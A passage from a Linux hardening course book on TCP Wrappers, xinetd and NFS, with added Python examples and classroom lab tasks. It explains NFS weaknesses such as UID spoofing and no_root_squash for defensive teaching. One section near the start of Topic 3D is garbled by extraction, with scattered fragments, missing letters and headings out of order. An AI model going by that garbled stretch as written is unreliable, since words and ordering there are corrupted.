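                 "user": "alice"}


def parse_rules(text):
    """Each non-comment line is daemon_list : client_list [: option]."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            parts = [p.strip() for p in line.split(":", 2)]
            rules.append((parts[0], parts[1], parts[2] if len(parts) > 2 else ""))
    return rules


def _list_match(expr, token_match):
    """Whitespace list with EXCEPT: 'a EXCEPT b' matches when a does and b does not."""
    head, sep, tail = " ".join(expr.split()).partition(" EXCEPT ")
    matched = any(token_match(tok) for tok in head.split())
    return matched and not (sep and _list_match(tail, token_match))


def _daemon_match(tok, conn):
    return tok == "ALL" or tok == conn["daemon"]


def _client_match(tok, conn):
    host, addr = conn.get("host"), conn["addr"]
    if tok == "ALL":
        return True
    if tok == "LOCAL":                 # hostname without a dot
        return host is not None and "." not in host
    if tok == "KNOWN":
        return host is not None
    if tok == "UNKNOWN":
        return host is None
    if tok == "PARANOID":              # forward/reverse lookup mismatch
        return conn.get("paranoid", False)
    if tok.startswith("."):            # domain suffix
        return host is not None and host.lower().endswith(tok.lower())
    if tok.endswith("."):              # leading address bytes
        return addr.startswith(tok)
    if "/" in tok:                     # net/mask: dotted mask or prefix length
        return ipaddress.ip_address(addr) in ipaddress.ip_network(tok, strict=False)
    return tok == addr or (host is not None and tok.lower() == host.lower())


def expand(template, conn):
    """Expand tcpd % sequences (%a %A %c %d %h %H %u %%) in a spawn command."""
    host = conn.get("host") or conn["addr"]
    server = conn.get("server_host") or conn["server_addr"]
    user = conn.get("user")
    subst = {"a": conn["addr"], "A": conn["server_addr"], "d": conn["daemon"],
             "h": host, "H": server, "u": user or "unknown",
             "c": "%s@%s" % (user, host) if user else host, "%": "%"}
    out, i = [], 0
    while i < len(template):
        if template[i] == "%" and i + 1 < len(template) and template[i + 1] in subst:
            out.append(subst[template[i + 1]])
            i += 2
        else:
            out.append(template[i])
            i += 1
    return "".join(out)


def hosts_access(allow_rules, deny_rules, conn):
    """Return (allowed, expanded spawn command or None)."""
    for verdict, rules in ((True, allow_rules), (False, deny_rules)):
        for daemons, clients, option in rules:
            if (_list_match(daemons, lambda t: _daemon_match(t, conn))
                    and _list_match(clients, lambda t: _client_match(t, conn))):
                cmd = None
                if option.startswith("spawn"):
                    cmd = expand(option[len("spawn"):].strip(), conn)
                return verdict, cmd
    return True, None      # no rule matched: tcpd's default is to allow


if __name__ == "__main__":
    allow, deny = parse_rules(SAMPLE_ALLOW), parse_rules(SAMPLE_DENY)
    print(hosts_access(allow, deny, LAN_FTP))
    print(hosts_access(allow, deny, REMOTE_TELNET))
```

The local ftp connection is accepted by the allow file before the deny file is consulted; the Telnet connection falls through to hosts.deny, where the booby trap fires with %c expanded to alice@pc7.example.net before the catch-all ALL: ALL is reached.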

TASK 3C-1
Controlling Access with TCP Wrappers

1. You have been assigned the project to manage access to certain Linux services on your corporate network. Your manager has given you the following restrictions to implement; in the space provided, create the necessary /etc/hosts.allow and /etc/hosts.deny files.

All local hosts should be able to use all services, except for telnet.

All hosts from the securitycertified.net domain should be denied, except for scnp_server.securitycertified.net, which should have access to all services.

All hosts from the 172.16.32.0/24 network should be granted access to all services except telnet.

All other hosts and services should be denied.

/etc/hosts.allow
ALL EXCEPT in.telnetd: LOCAL
ALL EXCEPT in.telnetd: 172.16.32.
ALL: scnp_server.securitycertified.net

/etc/hosts.deny
ALL: ALL

2. Do not implement this solution; rather, discuss your results with the rest of the class.

Objective: To investigate how TCP Wrappers can be used for access control by developing a possible solution for a fictitious scenario.

For this task, make sure that students do not change the actual files on their lab machines, or the success of future activities could be severely compromised.

The xinetd Superdaemon

In Linux, sooner or later, you will encounter a superdaemon. A superdaemon is essentially a daemon that controls other daemons, and xinetd is one. Before xinetd there was the inetd superdaemon, which handled network access requests. Inetd allowed you to disable services that you did not want to use, but provided no further security controls. It has since been replaced by xinetd.

Xinetd is used together with TCP wrappers to protect the services of the system. TCP wrappers control access to the services, and xinetd controls the configuration of the services themselves. The two work together, and both are part of the Red Hat 8 distribution. (Previously, these two components had to be compiled and installed when needed.)

The xinetd.conf File

The primary configuration information for xinetd is found in the /etc/xinetd.d directory. In this directory you will find the specific configuration files for the network services that you want to control. The primary configuration file that manages xinetd itself is /etc/xinetd.conf.

Configuring xinetd (2 slides)

The /etc/xinetd.conf file contains the configuration settings that apply to all services. The default file has several options, including instances, log_type, log_on_success, log_on_failure, and cps. Figure 3-18 shows an example xinetd.conf file.

Figure 3-18: The default xinetd.conf file running on Red Hat Linux 8.0.

Looking at the defaults in the example file, the following is a breakdown of the options and their meanings:

instances: This variable defines the maximum number of requests for a particular service that can be handled at once.

log_type: This variable defines how xinetd should handle logging. The default is SYSLOG authpriv, so messages go through syslog and, with the /etc/syslog.conf shipped by Red Hat, end up in /var/log/secure.

log_on_success: This variable defines what xinetd logs if the connection is successful. The default is the host IP address and the process ID of the server process.

log_on_failure: This variable defines what xinetd logs if the connection fails. The default is the host IP address.

cps: This variable defines the number of connections per second that are allowed to any one given service. It is entered as two space-separated numbers: the first is the number of connections per second, and the second is the wait period (in seconds) during which the service is disabled once the limit has been reached.

The defaults are adequate for many situations, but there are some changes you can make to the xinetd.conf file that will tighten the security of the default operation. The following options are suggested for the file:

Create a no-access rule for everyone. This means that access to services will need to be configured on a service-by-service level. If you address this in your TCP wrappers configuration, then this is a redundant step.

Lower the number of instances for a service from the default of 60 to 30. You will want to keep an eye on this for services that you grant, such as FTP, so that clients are not denied access.

Add a DURATION log for successful use of services by a remote system. This data can be used for tracking purposes.

Add an ATTEMPT log for each failed attempt at accessing a service.

Add a RECORD log for failed attempts to track information about the remote system. This only works with select services, such as login and finger, that can be security risks when they are running.

Add a restriction on the number of connections a single host can make to a service. A recommendation is 10, and this is done using a per_source line.

Disable all services that you want to have blocked completely. A common example is the r services, as they are inherently insecure.

The following example is what the xinetd.conf file might look like once you have made these changes to harden its configuration:

instances       = 30
log_type        = SYSLOG authpriv
log_on_success  = HOST PID DURATION
log_on_failure  = HOST ATTEMPT RECORD
per_source      = 10
no_access       = 0.0.0.0/0
disabled        = rlogin rsh rexec

This example shows one possible configuration of a hardened xinetd.conf file. Once you have made the modifications to the overall configuration file, you can move into the more granular configuration files of the specific services.

The xinetd.d Configuration Files

When the xinetd superdaemon starts, it reads the files in the /etc/xinetd.d directory. These files generally have the same, or a similar, name as the service they relate to. The service-specific configuration files have the same file structure as the overall xinetd.conf file you examined earlier.

Having separate files in the xinetd.d directory allows for the management of services in simple, small files. A single file to manage would get out of control quickly, and would make it more complex to add and remove services. The following example configuration file is for the ftp service:

service ftp
{
    disable     = no
    socket_type = stream
    wait        = no
    user        = root
    server      = /usr/sbin/in.ftpd
    nice        = 10
}

This example shows how a simple default configuration file looks. The configuration files generally share common characteristics:

They start with the service name as the first line. This is generally the service name as listed in /etc/services.

Following the service name are the braces, within which the configuration details are found.

TCP connections usually have a stream socket type, and UDP connections usually have a dgram socket type.

In the example, the first line inside the braces defines the service availability. If you want this service to be unavailable to anyone, you can simply disable it at this point. The second line defines the connection type. Often this will be either stream or dgram, although there are two other options: raw and seqpacket. Because the connection is set to stream, wait is set to no, as is the normal case for stream services. The user that runs the ftp server is the root account. The server itself is located at /usr/sbin/in.ftpd.

The nice value defines the scheduling priority of the server process. Values run from -20 to 19, with lower numbers meaning higher priority, so -20 is the highest. The default is 0; a value of 10, as in this example, runs the server at a reduced priority.

Figure 3-19: An example xinetd.d configuration file for the ftp service.

Figure 3-19 has had some additions made to the default ftp configuration file. It is worth noting that there are over 40 configuration options that can be set in these files, and not all of them can be detailed here in the interest of time. If you are interested in reading and examining all of the options, please read the xinetd.conf man page. One of the configuration options is to add to or remove from the existing configuration. This is done using either the += or the -= operator. In other words, if you are adding a value such as DURATION to log_on_success, the operator is +=. DURATION is then included in the process of checks for that service. Likewise, if you are ready to remove a value, you would use a line such as this: log_on_success -= DURATION. These operators adjust the list inherited from xinetd.conf rather than replacing it, which is what a plain = would do. The following examples define lines that can be added to the configuration files to increase security, or to control the access of the system more closely. There is a comment above each line defining the line, followed by the configuration line itself.

# Change the log to a defined file, instead of using the default SYSLOG
log_type = FILE /var/log/custom_ftp_service.log
# Grant access from only a single network, based on IP address
only_from = 10.20.0.0/16
# Grant access to a single host, based on IP address
only_from = 10.20.23.45
# Grant access to two hosts, based on IP address
only_from = 10.20.23.45 10.20.23.55
# Deny access to a single host, based on IP address
no_access = 10.20.23.45
# Deny access to a single network, based on IP address
no_access = 10.20.23.0/24
# Grant access only during defined hours
access_times = 06:00-19:00
# Adding the ability to track DURATION on successes
log_on_success += DURATION
# Removing the option to track the RECORD on failures
log_on_failure -= RECORD
# Raise the priority above the default file's nice = 10 (for example, 3)
nice = 3
# Add an identifier for the internal ftp server
id = internal_ftp
# Stop accepting connections for this service while the
# one-minute system load average is above 2.5
max_load = 2.5
# Prevent flooding of the system with requests for the same service.
# Limit the service to 5 connections per second; if that is exceeded,
# disable the service for 45 seconds
cps = 5 45
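The following script, an added example rather than the course book's or xinetd's own code, reads a defaults block and a service block like the ones above, merges them with the =, += and -= operators just described, and then applies the access attributes (disable, disabled, only_from, no_access, access_times) to a candidate connection. It assumes that every defaults attribute is inherited by the service, that network tokens are written as CIDR or dotted-mask addresses (hostnames are not resolved), and that when a client matches both only_from and no_access the longer prefix wins. The sample configuration is constructed from the hardened settings in this section.

```python
"""Merge xinetd.conf defaults with a service entry and apply its access rules.

Added example; this is not code from the course book or from xinetd. It
parses defaults and service blocks, builds a service's effective settings
(the service inherits the defaults; = replaces a value, += appends to and
-= removes from a list), then applies disable/disabled, only_from,
no_access and access_times to one connection. When a client matches both
only_from and no_access the longer network prefix wins. Assumptions: all
defaults attributes are inherited; address tokens are CIDR or dotted-mask.
"""
import ipaddress
import re
from datetime import time

# Constructed sample: the hardened defaults from the text plus an internal
# ftp service that narrows access and adjusts the inherited log lists.
SAMPLE_CONF = """
defaults
{
    instances       = 30
    log_type        = SYSLOG authpriv
    log_on_success  = HOST PID
    log_on_failure  = HOST ATTEMPT RECORD
    per_source      = 10
    no_access       = 0.0.0.0/0
    disabled        = rlogin rsh rexec
}

service ftp
{
    disable         = no
    socket_type     = stream
    wait            = no
    user            = root
    server          = /usr/sbin/in.ftpd
    only_from       = 10.20.0.0/16
    access_times    = 06:00-19:00
    log_on_success  += DURATION
    log_on_failure  -= RECORD
    cps             = 5 45
}
"""
SAMPLE_MORNING, SAMPLE_NIGHT = time(9, 0), time(22, 0)   # constructed clock times

LIST_ATTRS = {"log_on_success", "log_on_failure", "only_from", "no_access",
              "access_times", "disabled", "enabled", "env", "passenv"}
BLOCK_RE = re.compile(r"(defaults|service\s+(\S+))\s*\{(.*?)\}", re.S)
ATTR_RE = re.compile(r"^\s*(\w+)\s*(\+=|-=|=)\s*(.*?)\s*$")


def parse_conf(text):
    """Return (defaults, {service: attrs}); attrs are (name, op, value) triples."""
    defaults, services = [], {}
    for block in BLOCK_RE.finditer(text):
        attrs = []
        for line in block.group(3).splitlines():
            match = ATTR_RE.match(line.split("#", 1)[0])
            if match:
                attrs.append(match.groups())
        if block.group(1) == "defaults":
            defaults = attrs
        else:
            services[block.group(2)] = attrs
    return defaults, services


def _apply(effective, name, op, value):
    if name not in LIST_ATTRS:
        effective[name] = value            # scalar attribute: only = is meaningful
        return
    current, tokens = list(effective.get(name, [])), value.split()
    if op == "=":
        current = tokens
    elif op == "+=":
        current += [t for t in tokens if t not in current]
    else:
        current = [t for t in current if t not in tokens]
    effective[name] = current


def effective_settings(defaults, attrs):
    """Defaults first, then the service's own lines in file order."""
    effective = {}
    for name, op, value in defaults + attrs:
        _apply(effective, name, op, value)
    return effective


def _longest_match(addr, networks):
    """Prefix length of the most specific network containing addr, or -1."""
    best = -1
    for net in networks:
        network = ipaddress.ip_network(net, strict=False)
        if addr in network:
            best = max(best, network.prefixlen)
    return best


def _within(spans, when):
    """access_times spans such as 06:00-19:00; an end of 24:00 is open-ended."""
    for span in spans:
        start, end = span.split("-")
        h1, m1 = map(int, start.split(":"))
        h2, m2 = map(int, end.split(":"))
        if time(h1, m1) <= when and (h2 >= 24 or when <= time(h2, m2)):
            return True
    return False


def access_allowed(settings, name, client_ip, when):
    """Apply the access attributes of one service to one connection."""
    if settings.get("disable") == "yes" or name in settings.get("disabled", []):
        return False
    addr = ipaddress.ip_address(client_ip)
    allow = _longest_match(addr, settings.get("only_from", []))
    deny = _longest_match(addr, settings.get("no_access", []))
    if "only_from" in settings and allow < 0:
        return False                        # only_from given, client not in it
    if deny >= 0 and deny >= allow:
        return False                        # no_access wins unless only_from is more specific
    if "access_times" in settings and not _within(settings["access_times"], when):
        return False
    return True


if __name__ == "__main__":
    defaults, services = parse_conf(SAMPLE_CONF)
    ftp = effective_settings(defaults, services["ftp"])
    print(ftp["log_on_success"], ftp["log_on_failure"])
    print(access_allowed(ftp, "ftp", "10.20.23.45", SAMPLE_MORNING),
          access_allowed(ftp, "ftp", "172.16.1.1", SAMPLE_MORNING))
```

The output shows why the default no_access = 0.0.0.0/0 is safe to pair with a per-service only_from: the /16 entry is more specific than /0, so the internal client is admitted during office hours while a host outside the range, or any service that has not declared its own only_from, is refused.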


Binding and Redirection

Another feature of xinetd is the ability to bind a service to an IP address. This can be a useful feature, even more so if your computer has multiple interfaces or multiple IP addresses. It is added by using a bind = IP address line in the configuration file. The following example is for an FTP server that has two interfaces. One interface is on the internal network, and the other is on the external network. The internal network has no time restrictions on access to the FTP server, but the external network is allowed to access the server only between 10:00 A.M. and 4:00 P.M. The first file is the configuration for the internal clients. It is bound to an IP address, and allows only certain IP addresses to connect.

/etc/xinetd.d/ftp_internal
service ftp
{
    id          = ftp_internal
    disable     = no
    socket_type = stream
    wait        = no
    user        = root
    server      = /usr/sbin/in.ftpd
    nice        = 7
    cps         = 5 30
    only_from   = 192.168.10.0/24
    bind        = 192.168.10.1
}

This second file is the configuration for the external clients. Notice that the priority level is a bit lower, and that the cps is a lower value. There are no IP address restrictions, but there is a time restriction.

/etc/xinetd.d/ftp_external
service ftp
{
    id           = ftp_external
    disable      = no
    socket_type  = stream
    wait         = no
    user         = root
    server       = /usr/sbin/in.ftpd
    nice         = 10
    cps          = 4 45
    bind         = 192.168.20.1
    access_times = 10:00-16:00
}

These examples show how bind can be used with xinetd. Another feature is called redirection. Redirection allows a service to redirect requests to a different IP address and port number. A user can be rerouted to a different machine entirely for access to the service, with no notice given to the user; this is designed to be transparent. When binding and redirection are combined, you can create some very custom configurations. For example, you can bind a service to an IP address, then redirect requests for the service to a second machine in the network. This enables a request for a service to go to a computer that is customized to serve just the defined purpose. The second computer does not have to be a Linux machine. All that is required is that it is running the required service in the right location (the specified port). The right location is mentioned because you can change the port numbers of services, so as long as the second computer is running the desired service on the defined port, any port number will do.

In this example, there are two configurations for the telnet service. The first configuration is for the computer that is connected to the Internet; it forwards each request to port 3456 on the internal machine. When redirect is set, xinetd does not start a local server for the service, so no server line is needed.

service telnet
{
    id          = telnet_external
    disable     = no
    socket_type = stream
    wait        = no
    user        = root
    bind        = 192.168.10.1
    redirect    = 172.16.34.51 3456
}

The second computer has a configuration similar to a normal telnet configuration file. There are no lines here regarding redirection; the service is simply bound to the internal address and listens on port 3456. Because telnet3456 is not a name in /etc/services, the entry has to declare itself UNLISTED and name its protocol and port.

service telnet3456
{
    id          = telnet_internal
    type        = UNLISTED
    disable     = no
    socket_type = stream
    protocol    = tcp
    wait        = no
    user        = root
    server      = /usr/sbin/in.telnetd
    bind        = 172.16.34.51
    port        = 3456
}

TASK 3C-2
Managing Telnet with xinetd

Setup: For this task, students should work in pairs. You are logged on to Red Hat 8 as root, and a Terminal Window is open. Telnet sends credentials and session data in cleartext; it is enabled here on the isolated classroom network only to exercise xinetd.

1. Open Red Hat User Manager, and create a new user named telnettest, with the password of telnetpwd. Then close User Manager.

2. Open the Nautilus File Manager, and navigate to /etc/xinetd.d.

3. Right-click the telnet configuration file, and open it with Emacs. Emacs is a popular Linux text editor.

4. Enable Telnet, making sure that disable = no is set.

5. Save and close the file.

6. In a Terminal Window, enter killall -HUP xinetd to signal the xinetd process to re-read its configuration so that your changes take effect.

7. Enter telnet <partnerIPaddress> to attempt to telnet into your partner's computer. Use the telnettest credentials specified at the start of this task.

8. After a login has been established, enter exit to close the telnet session.

9. Use Emacs to open the telnet configuration file in /etc/xinetd.d.

10. Place the insertion point at the end of the line just before the closing brace, and press Enter. Add the following line to your configuration to restrict usage of the telnet service: only_from = 10.20.30.40. This IP address should not exist in the classroom!

11. Save and close the file.

12. Signal xinetd again with killall -HUP xinetd so that your changes take effect.

13. Attempt to telnet into your partner's computer. This time the connection is not successful.

14. Close the Nautilus File Manager.

Topic 3D

The next step in securing your Linux machine is to secure any network services, such as NFS, NIS, and Samba, that you have running on it. Lets begin with NFS.

Ed
T DU

Securing Network Services

Conguring NFS

st

Creating the actual object you want to share on the NFS server is a matter of a few short steps. But, before jumping right into the conguration of the shared objects, you should take a moment to look into the les behind NFS, and how NFS works. The three primary conguration les for setting up and using NFS securely are /etc/hosts.deny, /etc/hosts.allow, and /etc/exports. Earlier in this course, you used the /etc/hosts.deny and the /etc/hosts.allow les, so they will not be detailed here (but they will be involved). This leaves /etc/exports as the new le to congure. The /etc/exports is essentially the access control conguration le for the le systems that are to be exported to NFS clients. This le is used by two daemons, the NFS mount daemon (mountd), and the NFS le server daemon (nfsd).

194

Hardening The Infrastructure (SCP)

In

DO

ru ct

There are two primary components of using NFS, the NFS server and the NFS client. The general process is quite straightforward. The NFS server creates the shared object, which is called the export. The NFS client then mounts the exported object from the NFS server. If your system is running TCP wrappers, the /etc/hosts.allow and /etc/hosts.deny les will be read to identify if a client is allowed to access the NFS server. If the client is granted access through TCP wrappers, the conguration le for the NFS server is /etc/exports.

NFS Server Configuration

NO

PL

The Network File System (NFS) enables hosts to mount partitions on remote computers and use those mounted partitions in the same manner as local partitions. This allows for sharing of ies to authorized users across the network. The fact that they are accessed like local partitions means that neither special passwords nor special access commands are required.

or

IC

AT

NFS

iti

on

# Allow all hosts access to the mount daemon rpc.mountd: ALL

or
DO NO

ru ct

Lesson 3: Hardening Linux Computers

The nfsd daemon runs on the NFS server and handles the client requests for file system operations. Although the details of each are beyond the scope of this book, there are a few other daemons that are used in serving NFS. All told, there are five daemons: rpc.nfsd, rpc.lockd, rpc.statd, rpc.mountd, and rpc.rquotad. These daemons are part of the nfs-utils package, and are usually found in the /sbin or /usr/sbin directory.

The mountd program is used when the NFS server receives a mount request from an NFS client. It checks the /etc/exports file for access rights, and if access is permitted, mountd hands back a file handle for the requested directory and adds a single entry to the /etc/rmtab file. When an unmount request is received, mountd removes the client's entry from /etc/rmtab. (The /etc/rmtab file contains a listing of clients that have mounted remote file systems from the local machine.) Mountd is built with TCP wrappers support, so access to it can be controlled through /etc/hosts.allow and /etc/hosts.deny. For example, if you want all hosts to have access to the mountd daemon, add an entry for mountd that grants access to ALL to the /etc/hosts.allow file. Keep in mind that rmtab is advisory only: a client that already holds a file handle can keep using it whether or not its rmtab entry is present, so never treat rmtab as an access control.

Finally, on the service end, NFS depends on the portmapper daemon. This daemon is called either portmap or rpc.portmap. Portmap converts Remote Procedure Call (RPC) program numbers into DARPA protocol port numbers. When any RPC server starts, it registers with portmap the port it is listening on and the RPC program numbers it will serve. When a client wants to call an RPC program number, it first asks portmap for the port number to send the RPC packets to. Because NFS uses RPC, portmap is a requirement.

DARPA: Defense Advanced Research Projects Agency.

With the services and daemons defined, you are now ready to get into the main configuration file for the NFS server. The /etc/exports file contains, for each export, the mount point of the object to be shared and a list of the machines or other clients that are allowed to mount the file system.

Clients who want to use NFS can be defined by using different methods. One is to use the Network Information Service (NIS), which will be detailed shortly. Outside of NIS, you can use IP addresses, domain names, subnets, and wildcards.

The syntax then is as follows: <directory to share> <client1>(options) <client2>(options). The options are defined per client, to control that client's access to the shared directory. There are five options for client access that you should understand:

ro: Directory access for the client is read-only. This is the default.

rw: Directory access for the client is read and write.

no_root_squash: By default, any request made by the root account on a client is treated by the NFS server as if it were made by the nobody user account (the UID of nobody is based on the setting on the NFS server, not the client). If no_root_squash is enabled, any request made by the root account on the remote machine is given the same level of access as the root account on the NFS server. For this reason, this setting is not recommended.

no_subtree_check: If you export only part of a volume, the server checks for every request that the file the NFS client is asking for really lies within the exported part of the volume (subtree checking). If the whole volume is exported, disabling the check with no_subtree_check avoids that overhead and can increase the transfer rate; if only a subdirectory is exported, turning it off means a client that obtains a file handle can reach files on the same volume outside the exported subtree.

sync: The exportfs command (which applies the contents of /etc/exports) can use the async or sync method of informing the NFS client that a write operation has finished. With sync, the server replies to the client only after the write has been committed to stable storage. With async, the reply is sent once the request has been processed, without waiting for the write to finish; this is faster, but data the client believes is saved can be lost if the server crashes.

Here are a few examples of what lines in the /etc/exports file might look like:

# Export /R&D to IP address 172.16.55.63 with read
# and write access
/R&D 172.16.55.63(rw)
# Export /Policy to the entire 172.16.55.0/24 network
# with read access
/Policy 172.16.55.0/255.255.255.0(ro)
# Export /tech to the 192.168.20.0/24 network
# allowing root access, and read and write access
/tech 192.168.20.0/24(rw,no_root_squash)

Note that the options for a client are written as a comma-separated list inside the parentheses, with no space between the client and the opening parenthesis; the reason that matters is covered under Securing NFS later in this topic.

Configuring NFS Exports

Just as with other configuration options in Linux, there are several methods of setting up NFS. You have examined some of the command lines, programs, and daemons that are involved in using NFS. One of the graphical methods of working with NFS is through the Webmin Web-based administrative tool you installed earlier in the lesson. Figure 3-20 shows Webmin's window for creating a new exported directory.

Figure 3-20: Using Webmin to create an exported directory.

You can see that the options are presented in a simple-to-use GUI that provides fields to fill in and radio buttons to configure the shared directory. Remember that when you are using this tool, you can access and configure this information from any browser; that convenience also means the Webmin port itself must be restricted to administrative hosts, because anyone who can reach it and log in can rewrite /etc/exports.

Webmin provides one option for configuring NFS, and you should explore its abilities. In this section, however, you are going to perform tasks using the tools built in to the Red Hat operating system.

The tool to use in Red Hat is called NFS Server, and it is found by choosing Server Settings from the Red Hat Main Menu, or by entering the command redhat-config-nfs in a Terminal Window. Figure 3-21 shows the NFS Server tool.

Figure 3-21: Red Hat's NFS Server Configuration tool.

In this tool, there are only a few primary options. The first one to examine is the process of adding a share. To do this, simply click the Add button to display the window shown in Figure 3-22, where the share information can be defined.

Figure 3-22: Adding an NFS Server share in the NFS Server configuration tool.

The Basic tab has just a few fields to fill out to create the share. In the Directory field, you fill in the directory that you want to share (be sure that the directory actually exists!). In the Hosts field, you fill in the hosts that are to access the share. Then, select the permission level you want to grant for the share. The General Options tab has several more fields to fill out, but none that are required to create the share. Finally, the User Access tab presents a few more fields you can fill out, such as the previously mentioned no_root_squash.

If you want to modify an existing NFS share, simply open the NFS Server configuration tool, select the rule, and click Properties. Likewise, to delete a rule, select the rule and click Delete. At any time, you can check the implementation of the NFS shares you are creating by looking in the /etc/exports file, to be sure the configurations are as you were expecting. All applied changes in the server tool will be visible in the /etc/exports file.

From the NFS client standpoint, the configuration is even more streamlined. The client computer requires portmap, rpc.statd, and rpc.lockd to be running, just as they are required on the server. These services should be configured to start at boot. Once those services are enabled, the client configuration can happen. There are a few ways to configure the client to use NFS. The first option is to use the default mount command to mount the exported directory. Even though this is a simple process, there is a downside to this option: every time the system restarts, the root account will need to enter the mount command and reconnect to the shared directory. Furthermore, the root account is required to unmount the shared directory every time the system shuts down. Here are a couple of examples showing a standard mount command for an exported directory (the mount point on the local host must already exist):

# NFS server 10.20.23.45, exporting /home, is
# mounted on the local host at /mnt/tmp/45/home
mount -t nfs 10.20.23.45:/home /mnt/tmp/45/home
# NFS server host1.example.com, exporting /test, is
# mounted on the local host at /test
mount -t nfs host1.example.com:/test /test

As was mentioned, the standard mount commands are to be entered by the root account as the system starts up, and the mounts are to be unmounted by the root account as the system shuts down. It would be more efficient in many situations for that process to be automatic, and not require the manual input of the root account. This is done by adding the NFS file systems to the /etc/fstab file. This way, NFS mounts are added when the system starts up, in the same manner that local file systems are. The basic syntax of an /etc/fstab line is <device> <mountpoint> <fs-type> <options> <dump> <fsckorder>, where:

Device is the location of the NFS exported directory, in the form server:/path.

Mountpoint is the mount location on the local host.

Fs-type is the file system type; here, it will be nfs.

Options is the list of mount options, such as ro or rw. For an NFS mount from a server you do not fully control, consider adding nosuid and nodev here as well, so that setuid binaries and device nodes on the export cannot be used to gain privilege on the client.

Dump is usually 0 for NFS shares.

Fsckorder is usually 0 for NFS shares.

The following is an example of an NFS client /etc/fstab line. This line states that there is an NFS server host1.example.com exporting the directory /scnp, the local mount point is /mnt/certs/scnp, and the access permissions are read and write.

host1.example.com:/scnp /mnt/certs/scnp nfs rw 0 0
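The /etc/fstab syntax above is where client-side hardening happens. The following Python script is an added example, not code from the course book: it parses an fstab (a constructed sample that includes the book's own line), reports NFS mounts that lack the nosuid and nodev options, and produces the corrected line. The mount option names are the real ones; the sample entries and the RECOMMENDED list are the example's own choices.

```python
# Added example (not code from the course book): an audit of the NFS
# entries in /etc/fstab. The book's line mounts with plain "rw"; this
# checker reports NFS mounts that lack nosuid and nodev and shows the
# corrected line. The fstab text is constructed for illustration.

RECOMMENDED = ("nosuid", "nodev")   # keep setuid binaries and device nodes on a
                                    # remote export from granting privilege here


def parse_fstab(text):
    """Return one dict per NFS entry: server, export, mountpoint, fstype, options."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 4:
            continue                          # malformed line; mount would reject it
        device, mountpoint, fstype, opts = fields[:4]
        if fstype not in ("nfs", "nfs4"):
            continue
        server, _, export = device.partition(":")
        entries.append({
            "server": server,
            "export": export,
            "mountpoint": mountpoint,
            "fstype": fstype,
            "options": opts.split(","),
        })
    return entries


def check_nfs_mounts(text):
    """Return {mountpoint: [missing option, ...]} for NFS mounts that need attention."""
    report = {}
    for entry in parse_fstab(text):
        missing = [o for o in RECOMMENDED if o not in entry["options"]]
        if missing:
            report[entry["mountpoint"]] = missing
    return report


def hardened_line(entry):
    """Rewrite one parsed entry as an fstab line with the missing options added."""
    opts = list(entry["options"])
    opts += [o for o in RECOMMENDED if o not in opts]
    return (f"{entry['server']}:{entry['export']} {entry['mountpoint']} "
            f"{entry['fstype']} {','.join(opts)} 0 0")


# Constructed sample: a local root file system plus two NFS mounts,
# the first taken from this topic and the second already hardened.
SAMPLE_FSTAB = """\
LABEL=/                 /                ext3  defaults          1 1
host1.example.com:/scnp /mnt/certs/scnp  nfs   rw                0 0
10.20.23.45:/home       /mnt/tmp/45/home nfs   ro,nosuid,nodev   0 0
"""

if __name__ == "__main__":
    weak = check_nfs_mounts(SAMPLE_FSTAB)
    for entry in parse_fstab(SAMPLE_FSTAB):
        if entry["mountpoint"] in weak:
            print("missing:  ", weak[entry["mountpoint"]])
            print("hardened: ", hardened_line(entry))
```

Run it with python3 against a copy of a real /etc/fstab by replacing SAMPLE_FSTAB with the file's contents; the hardened line can then be pasted back in and applied with mount -o remount on the mount point.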

TASK 3D-1
Sharing Data with NFS

Setup: For this task, students should work in pairs. You are logged on to Red Hat 8 as root, and a Terminal Window is open.

1. Create a directory called /nfs_share.

2. Add files and/or directories to the new folder by creating new files or copying them from elsewhere.

3. From the Red Hat Main Menu, choose Server Settings→NFS Server to open the NFS Server Configuration tool.

4. Click the Add button.

5. In the Directory field, browse to your nfs_share directory. You can also type the directory name into this field.

6. Change the permissions to Read and Write.

7. In the Hosts field, enter the IP address of your partner's computer.

8. Click OK to accept the settings, and to close the Add NFS Share window.

9. Click the Apply button to force the changes to take effect. If you are prompted to start the NFS Service, click Yes.

10. Close the NFS Server Configuration tool, saving changes if prompted.

11. Create a directory named /mnt/nfs1.

12. In a Terminal Window, enter mount a.b.c.d:/nfs_share /mnt/nfs1 to mount your partner's NFS share. Be sure to replace a.b.c.d with your partner's IP address.

13. Browse in your /mnt/nfs1 directory to see what files you now have access to.

If you are denied access to the files, check the permissions on the nfs_share directory. Others must have Read (and, for directories, Execute) permission in order to see the files in the NFS share, because the server applies ordinary Linux file permissions to the UID each request arrives with.

14. Close all open windows.

Securing NFS

As you can see, NFS provides a straightforward method of sharing files and directories between hosts. You might also have seen that there are very few security controls in place. You will need to take advantage of the available security controls in order to provide a safe NFS environment.

You might have noticed that there were no authentication measures in the process of using NFS. The closest was having the right IP address. If your address matches one that is assigned to the export on the NFS server, you are granted access; from then on the server trusts whatever UID and GID the client puts in each request. Other problems can exist with User IDs. For example, assume User1 on the NFS Server has a UID of 1234 and creates a file in a directory that is exported. User1 then sets the permissions so that only User1 has access to this file. If User2 (on another machine) also has a UID of 1234 and mounts the exported directory, User2 will have access to the object that was previously secured. It follows that anyone who is root on an allowed client can simply create a local account with UID 1234 and read the file. Don't despair, however; you can make NFS more secure than the default!
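The UID problem just described can be modelled in a few lines. The following Python code is an added example, not code from the course book; the UID 1234, the value 65534 for nobody, and the 0600 file are constructed for illustration. It shows why a matching UID on another allowed host is enough to read the file, and what root_squash does and does not stop.

```python
# Added example (not code from the course book): a model of the access
# check an NFS server performs. The server trusts the UID the client puts
# in each request, applies root_squash, then tests ordinary Unix permission
# bits. The UIDs and the file below are constructed for illustration.
import stat

ANON_UID = 65534   # the server's "nobody"; set per export with anonuid= (assumed value)


def effective_uid(client_uid, export_opts):
    """Map the UID a client claims to the UID the server acts as."""
    if client_uid == 0 and "no_root_squash" not in export_opts:
        return ANON_UID          # root_squash is the default
    return client_uid


def permitted(client_uid, export_opts, owner_uid, mode, want):
    """Return True if a request carrying client_uid may read ('r') or write
    ('w') a file owned by owner_uid with permission bits mode. Group bits
    are left out of this model for brevity."""
    if want == "w" and "rw" not in export_opts:
        return False             # ro is the default export option
    uid = effective_uid(client_uid, export_opts)
    if uid == 0:
        return True              # unsquashed root bypasses permission bits
    if uid == owner_uid:
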